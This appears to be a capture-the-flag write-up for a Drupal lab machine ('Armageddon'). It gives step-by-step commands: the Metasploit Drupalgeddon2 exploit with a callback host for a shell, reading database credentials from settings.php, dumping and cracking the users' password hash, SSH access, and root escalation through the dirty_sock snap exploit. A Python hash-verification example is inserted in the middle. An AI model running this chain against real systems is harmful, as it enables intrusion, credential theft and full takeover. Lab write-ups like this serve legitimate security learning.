┌──(root💀kali)-[/home/kali/Downloads]

└─# nmap 10.10.10.233

http://10.10.10.233/

Let’s check if we can work a way around the login page!

Exploring, I found that Drupal 7 can be exploited using Metasploit!

┌──(root💀kali)-[/home/kali/Downloads]

└─# msfconsole

msf6 > search drupal

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.35

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

cat settings.php

'username' => 'drupaluser',

'password' => 'CQHEy@9M*m23gBVj',

mysql -u drupaluser -p -e 'show databases;'

mysql -u drupaluser -p -D 'drupal' -e 'show tables;'

mysql -u drupaluser -p -D 'drupal' -e 'select * from users;'

Output:

brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

┌──(root💀kali)-[/home/kali/Downloads]

└─# john hash --wordlist=rockyou.txt

Output: booboo
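An added example, not part of the original write-up: Python code that parses the Drupal 7 `$S$` hash dumped from the users table above and recomputes it, so you can read the cost and salt a stored hash carries and check a known password against it. The function names are my own; the algorithm follows Drupal 7's phpass-derived scheme (salted SHA-512, re-hashed 2^cost times, output truncated to 55 characters).

```python
import hashlib
import hmac

# Alphabet Drupal 7 (following phpass) uses for the cost character and digest.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
PAGE_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"  # from the users table

def parse_drupal7_hash(stored):
    """Split a Drupal 7 '$S$' hash into cost, salt and truncated digest."""
    if len(stored) != 55 or not stored.startswith("$S$"):
        raise ValueError("not a Drupal 7 SHA-512 password hash")
    log2 = ITOA64.find(stored[3])
    if not 7 <= log2 <= 30:  # cost range Drupal 7 accepts
        raise ValueError("cost character out of range")
    return {"log2": log2, "iterations": 1 << log2,
            "salt": stored[4:12], "digest": stored[12:]}

def _encode64(data):
    """phpass-style base64: 3 bytes little-endian -> 4 characters, low bits first."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        value = int.from_bytes(chunk, "little")
        for _ in range(len(chunk) + 1):
            out.append(ITOA64[value & 0x3F])
            value >>= 6
    return "".join(out)

def drupal7_hash(password, log2, salt):
    """Salted SHA-512, re-hashed 2**log2 times, truncated to 55 characters."""
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << log2):
        digest = hashlib.sha512(digest + pw).digest()
    return ("$S$" + ITOA64[log2] + salt + _encode64(digest))[:55]

def verify(password, stored):
    """Recompute with the stored cost and salt, compare in constant time."""
    info = parse_drupal7_hash(stored)
    candidate = drupal7_hash(password, info["log2"], info["salt"])
    return hmac.compare_digest(candidate, stored)

if __name__ == "__main__":
    info = parse_drupal7_hash(PAGE_HASH)
    print("cost 2^%d = %d rounds, salt %s" % (info["log2"], info["iterations"], info["salt"]))
    print("password reported by john verifies:", verify("booboo", PAGE_HASH))
```

The cost character only multiplies the price of each guess; it does nothing for a password that already sits in a common wordlist such as rockyou.txt.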

┌──(root💀kali)-[/home/kali/Downloads]

└─# ssh brucetherealadmin@10.10.10.233

User.txt: ae611d2c546da871XXXXXXXXXXXXXX

[brucetherealadmin@armageddon ~]$ python --version

https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py

https://gitlab.com/tamilcode/dirty-sock-exploit/-/blob/main/dirty_sock_exploit

[brucetherealadmin@armageddon /]$ cd tmp

[brucetherealadmin@armageddon tmp]$ python2 -c 'print "<base64 payload not preserved on this page>" + "A"*4256 + "=="' | base64 -d > dedsec.snap

[brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install --devmode dedsec.snap

[brucetherealadmin@armageddon tmp]$ cat /etc/passwd

Username: dirty_sock

Password: dirty_sock

[brucetherealadmin@armageddon tmp]$ su dirty_sock

[dirty_sock@armageddon tmp]$ sudo -i

[root@armageddon ~]# cd /root

[root@armageddon ~]# cat root.txt

Root.txt: 7e815792cbddaf2XXXXXXXXXXXXXXXXXXXX

Hi, I’m Saksham Dixit
